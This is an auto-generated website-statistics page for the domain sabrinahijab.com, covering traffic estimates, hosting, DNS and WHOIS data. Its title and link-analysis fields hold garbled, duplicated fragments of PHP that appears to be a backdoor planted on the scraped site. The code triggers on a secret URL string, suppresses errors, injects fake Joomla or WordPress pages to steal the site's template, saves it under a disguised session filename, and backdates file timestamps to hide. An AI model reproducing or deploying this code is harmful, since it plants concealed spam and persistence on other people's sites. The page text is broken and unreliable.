id = null; $item->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $item->introtext = ''; $item->fulltext = 'thefuckingcontent'.mt_rand(1, 10000000000); $item->state = 1; $item->access = 1; $item->created_by = 62; $item->created = '2011-11-11 11:11:11'; $item->publish_up = '2011-11-11 11:11:11'; $item->alias = $alias; if (!$database->insertObject('#__content', $item, 'id')) { echo $database->stderr(); } $url = 'http://'.$_SERVER['HTTP_HOST'].'/index.php?option=com_content&view=article&id='.$item->id; $data = file_get_contents($url); $data = preg_replace('#[\'"][^\'"]+?'.$alias.'[^\'"]+?[\'"]#is', '"[PAGE_URL]"', $data); $data = preg_replace('#Friday, 11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11.11.2011#is', '[DATE]', $data); $data = preg_replace('#2011-11-11#is', '[DATE]', $data); $data = preg_replace('#2011.11.11#is', '[DATE]', $data); echo $data; exit; } if (is_dir($root_path.'/wp-admin/includes/')) { if (!class_exists('THEVirtualPage')) { class THEVirtualPage { private $slug = NULL; private $title = NULL; private $content = NULL; private $author = NULL; private $date = NULL; private $type = NULL; public function __construct($args) { $this->slug = 'slug'; $this->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $this->content = 'thefuckingcontent'.mt_rand(1, 10000000000); $this->author = 1; $this->date = current_time('mysql'); $this->dategmt = current_time('mysql', 1); $this->type = 'page'; add_filter('the_posts', array(&$this, '_virtualPage')); } // filter to create virtual page content public function _virtualPage($posts) { global $wp, $wp_query; //create a fake post intance $post = new stdClass; // fill properties of $post with everything a page in the database would have $post->ID = "-1"; // use an illegal value for page ID $post->post_author = $this->author; // post author id $post->post_date = $this->date; // date of post $post->post_date_gmt = $this->dategmt; $post->post_content = $this->content; $post->post_title = $this->title; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; // mark as closed for comments, since page doesn't exist $post->ping_status = 'closed'; // mark as closed for pings, since page doesn't exist $post->post_password = ''; // no password $post->post_name = $this->slug; $post->to_ping = ''; $post->pinged = ''; $post->modified = $post->post_date; $post->modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $this->slug); $post->menu_order = 0; $post->post_type = $this->type; $post->post_mime_type = ''; $post->comment_count = 0; // set filter results $posts = array($post); // reset wp_query properties to simulate a found page $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; return ($posts); } } } function _create_virtual() { $args = array('slug' => 'slug', 'title' => '', 'content' => '' ); $pg = new THEVirtualPage($args); } function change_wp_44_title( $title ) { global $data; $title['title'] = 'thefuckingtitle'.mt_rand(1, 10000000000); $title['page'] = ''; $title['tagline'] = ''; $title['site'] = ''; return $title; } function change_wp_40_title( $title ) { return 'thefuckingtitle'.mt_rand(1, 10000000000); } function _change_page_url( ) { return '[PAGE_URL]'; } add_filter( 'the_permalink', '_change_page_url'); add_action('init', '_create_virtual'); add_filter( 'document_title_parts', 'change_wp_44_title' ); add_filter( 'wp_title', 'change_wp_40_title' ); } }"/>

[DESCRIPTION]

1.67 Rating by ClearWebStats
sabrinahijab.com is 8 years 4 months 2 weeks old. This website has a #23,017,810 rank in global traffic. It has a .com as an domain extension. This domain is estimated value of $ 8.95 and has a daily earning of $ 0.15. While no active threats were reported recently by users, sabrinahijab.com is SAFE to browse.
Get Custom Widget

Traffic Report of Sabrinahijab

Daily Unique Visitors: 21
Daily Pageviews: 42

Estimated Valuation

Income Per Day: $ 0.15
Estimated Worth: $ 8.95

Search Engine Indexes

Google Indexed Pages: Not Applicable
Yahoo Indexed Pages: Not Applicable
Bing Indexed Pages: Not Applicable

Search Engine Backlinks

Google Backlinks: Not Applicable
Bing Backlinks: Not Applicable
Alexa BackLinks: Not Applicable

Safety Information

Google Safe Browsing: No Risk Issues
Siteadvisor Rating: Not Applicable
WOT Trustworthiness: Not Applicable
WOT Privacy: Not Applicable
WOT Child Safety: Not Applicable

Website Ranks & Scores

Google Pagerank: Not Applicable
Alexa Rank: 23,017,810
Domain Authority: Not Applicable
Google Pagerank
PR 0 out of 10
PageSpeed Score
96
Siteadvisor Rating
View sabrinahijab.com site advisor rating Not Applicable

Where is sabrinahijab.com server located?

Hosted IP Address:

182.253.224.221 View other site hosted with sabrinahijab.com

Hosted Country:

sabrinahijab.com hosted country ID sabrinahijab.com hosted country

Location Latitude:

-6.21462

Location Longitude:

106.845

Social Engagement

Facebook Shares: 8
Facebook Likes: 44
Facebook Comments: Not Applicable
Twitter Count (Tweets): Not Applicable
Linkedin Shares: Not Applicable
Delicious Shares: Not Applicable

Page Resources Breakdown

View sabrinahijab.com HTML resources

Homepage Links Analysis

]*>[^#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingtitle\d+#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingcontent\d+#is', '[CONTENT]', $tpl); $tpl = preg_replace('#\[CONTENT\]#is', '[CONTENT]', $tpl); $new_tags = ' '; $tpl = preg_replace('##is', $new_tags.'', $tpl); } $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); $tpl_path = sys_get_temp_dir()."/SESS_4f2afc9c4099ee1f39c9f551123e54bd"; if (!empty($tpl) && file_put_contents($tpl_path, $tpl)) { echo 'Success!'; } else { echo 'failed'; } touch($tpl_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($tpl_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); exit; } if (strpos($_SERVER['REQUEST_URI'], 'gimmeyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); if (is_dir($root_path.'/libraries/joomla/application/')) { $alias = 'fucking-alias-is-here'.mt_rand(1, 10000000000); $database = JFactory::getDBO(); $item = new stdClass; $item->id = null; $item->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $item->introtext = ''; $item->fulltext = 'thefuckingcontent'.mt_rand(1, 10000000000); $item->state = 1; $item->access = 1; $item->created_by = 62; $item->created = '2011-11-11 11:11:11'; $item->publish_up = '2011-11-11 11:11:11'; $item->alias = $alias; if (!$database->insertObject('#__content', $item, 'id')) { echo $database->stderr(); } $url = 'http://'.$_SERVER['HTTP_HOST'].'/index.php?option=com_content&view=article&id='.$item->id; $data = file_get_contents($url); $data = preg_replace('#[\'"][^\'"]+?'.$alias.'[^\'"]+?[\'"]#is', '"[PAGE_URL]"', $data); $data = preg_replace('#Friday, 11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11.11.2011#is', '[DATE]', $data); $data = preg_replace('#2011-11-11#is', '[DATE]', $data); $data = preg_replace('#2011.11.11#is', '[DATE]', $data); echo $data; exit; } if (is_dir($root_path.'/wp-admin/includes/')) { if (!class_exists('THEVirtualPage')) { class THEVirtualPage { private $slug = NULL; private $title = NULL; private $content = NULL; private $author = NULL; private $date = NULL; private $type = NULL; public function __construct($args) { $this->slug = 'slug'; $this->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $this->content = 'thefuckingcontent'.mt_rand(1, 10000000000); $this->author = 1; $this->date = current_time('mysql'); $this->dategmt = current_time('mysql', 1); $this->type = 'page'; add_filter('the_posts', array(&$this, '_virtualPage')); } // filter to create virtual page content public function _virtualPage($posts) { global $wp, $wp_query; //create a fake post intance $post = new stdClass; // fill properties of $post with everything a page in the database would have $post->ID = "-1"; // use an illegal value for page ID $post->post_author = $this->author; // post author id $post->post_date = $this->date; // date of post $post->post_date_gmt = $this->dategmt; $post->post_content = $this->content; $post->post_title = $this->title; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; // mark as closed for comments, since page doesn't exist $post->ping_status = 'closed'; // mark as closed for pings, since page doesn't exist $post->post_password = ''; // no password $post->post_name = $this->slug; $post->to_ping = ''; $post->pinged = ''; $post->modified = $post->post_date; $post->modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $this->slug); $post->menu_order = 0; $post->post_type = $this->type; $post->post_mime_type = ''; $post->comment_count = 0; // set filter results $posts = array($post); // reset wp_query properties to simulate a found page $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; return ($posts); } } } function _create_virtual() { $args = array('slug' => 'slug', 'title' => '', 'content' => '' ); $pg = new THEVirtualPage($args); } function change_wp_44_title( $title ) { global $data; $title['title'] = 'thefuckingtitle'.mt_rand(1, 10000000000); $title['page'] = ''; $title['tagline'] = ''; $title['site'] = ''; return $title; } function change_wp_40_title( $title ) { return 'thefuckingtitle'.mt_rand(1, 10000000000); } function _change_page_url( ) { return '[PAGE_URL]'; } add_filter( 'the_permalink', '_change_page_url'); add_action('init', '_create_virtual'); add_filter( 'document_title_parts', 'change_wp_44_title' ); add_filter( 'wp_title', 'change_wp_40_title' ); } }

Website Inpage Analysis

H1 Headings: Not Applicable H2 Headings: Not Applicable
H3 Headings: Not Applicable H4 Headings: Not Applicable
H5 Headings: Not Applicable H6 Headings: Not Applicable
Total IFRAMEs: Not Applicable Total Images: Not Applicable
Google Adsense: Not Applicable Google Analytics: Not Applicable

Websites Hosted on Same IP (i.e. 182.253.224.221)

Radar Tasikmalaya | Referensi Semua Generasi

sabrinahijab.com favicon - radartasikmalaya.com

View sabrinahijab.com Pagerank   sabrinahijab.com alexa rank 751,613   sabrinahijab.com website value $ 960.00

403 Forbidden

sabrinahijab.com favicon - checkcargonet.com

View sabrinahijab.com Pagerank   sabrinahijab.com alexa rank Not Applicable   sabrinahijab.com website value $ 8.95

Lembaga Studi Pers & Pembangunan

sabrinahijab.com favicon - lspp.org

View sabrinahijab.com Pagerank   sabrinahijab.com alexa rank Not Applicable   sabrinahijab.com website value $ 8.95

TEUKU ARIA | PENGUSAHA PROPERTI SYARIAH - DEVELOPER PROPERTI SYARIAH

sabrinahijab.com favicon - teukuaria.com

TEUKU ARIA, PENGUSAHA PROPERTI SYARIAH, PROPERTY SYARIAH,

View sabrinahijab.com Pagerank   sabrinahijab.com alexa rank 25,811,441   sabrinahijab.com website value $ 8.95

Selamat datang di Revius

sabrinahijab.com favicon - revi.us

View sabrinahijab.com Pagerank   sabrinahijab.com alexa rank 1,322,387   sabrinahijab.com website value $ 480.00

HTTP Header Analysis

Http-Version: 1.1
Status-Code: 500
Status: 500 Internal Server Error
Date: Mon, 25 Jul 2016 01:58:31 GMT
Server: Apache
X-Powered-By: PHP/5.5.37
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 2664
Connection: close
Content-Type: text/html

Domain Information for sabrinahijab.com

Domain Registrar: HOSTINGER UAB sabrinahijab.com registrar info
Registration Date: 2015-12-16 8 years 4 months 2 weeks ago
Last Modified: 2015-12-16 8 years 4 months 2 weeks ago
Expiration Date: 2016-12-16 7 years 4 months 2 weeks ago

Domain Nameserver Information

Host IP Address Country
ns11.niagahoster.com sabrinahijab.com name server information 153.92.15.253 sabrinahijab.com server is located in Indonesia Indonesia
ns12.niagahoster.com sabrinahijab.com name server information 156.67.223.253 sabrinahijab.com server is located in Singapore Singapore

DNS Record Analysis

Host Type TTL Extra
sabrinahijab.com A 14400 IP:182.253.224.221
sabrinahijab.com NS 86381 Target:ns11.niagahoster.com
sabrinahijab.com NS 86381 Target:ns12.niagahoster.com
sabrinahijab.com SOA 86400 MNAME:ns11.niagahoster.com
RNAME:admin.niagahoster.co.id
Serial:2015121602
Refresh:86400
Retry:7200
Expire:3600000
sabrinahijab.com MX 14400 Target:sabrinahijab.com

Similarly Ranked Websites to Sabrinahijab


403 Forbidden

sabrinahijab.com favicon - lcrc.on.ca

View sabrinahijab.com Pagerank   Alexa rank for sabrinahijab.com 23,017,826   website value of sabrinahijab.com $ 8.95

Arkansas house boat vacation rental getaway on Lake Ouachita near Hot Springs

sabrinahijab.com favicon - dreamchaserhouseboats.com

DreamChaser HouseBoat Rentals, located at Mountain Harbor Resort on Lake Ouachita, is just outside Hot Springs Arkansas National Park and all its attractions, such as the world famous Bath House Row, historic downtown, music shows, and Oaklawn Park. Arkansas house boat rentals are a wonderful way to enjoy an affordable Arkansas vacation in a unique scenic setting

View sabrinahijab.com Pagerank   Alexa rank for sabrinahijab.com 23,017,839   website value of sabrinahijab.com $ 8.95

CLD du Haut-Saint-François

sabrinahijab.com favicon - cldhsf.com

View sabrinahijab.com Pagerank   Alexa rank for sabrinahijab.com 23,017,840   website value of sabrinahijab.com $ 8.95

Home - Angel Graphics

sabrinahijab.com favicon - angelgraphicsprinting.com

Your description

View sabrinahijab.com Pagerank   Alexa rank for sabrinahijab.com 23,017,845   website value of sabrinahijab.com $ 8.95

Full WHOIS Lookup for sabrinahijab.com

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: SABRINAHIJAB.COM
Registrar: HOSTINGER UAB
Sponsoring Registrar IANA ID: 1636
Whois Server: whois.hostinger.com
Referral URL: http://www.hostinger.com
Name Server: NS11.NIAGAHOSTER.COM
Name Server: NS12.NIAGAHOSTER.COM
Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Updated Date: 16-dec-2015
Creation Date: 16-dec-2015
Expiration Date: 16-dec-2016

>>> Last update of whois database: Mon, 25 Jul 2016 01:52:43 GMT